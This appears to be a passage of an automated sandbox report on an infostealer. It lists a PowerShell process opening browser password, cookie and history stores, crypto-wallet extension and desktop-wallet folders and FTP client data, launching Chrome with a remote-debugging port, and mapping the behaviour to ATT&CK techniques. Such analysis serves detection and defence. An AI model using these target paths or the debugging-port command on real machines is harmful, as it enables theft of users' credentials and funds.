                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\prefs.jsJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\formhistory.sqliteJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.dbJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.jsonJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqliteJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: number of queries: 1002
                    Source: Yara matchFile source: 00000008.00000002.57431193652.0000000000629000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 9160, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 9160, type: MEMORYSTR
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                    Windows Management Instrumentation
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    11
                    Deobfuscate/Decode Files or Information
                    2
                    OS Credential Dumping
                    1
                    Network Service Discovery
                    Remote Services1
                    Archive Collected Data
                    1
                    Ingress Tool Transfer
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts2
                    Command and Scripting Interpreter
                    1
                    Create Account
                    1
                    Extra Window Memory Injection
                    3
                    Obfuscated Files or Information
                    LSASS Memory21
                    File and Directory Discovery
                    Remote Desktop Protocol41
                    Data from Local System
                    21
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
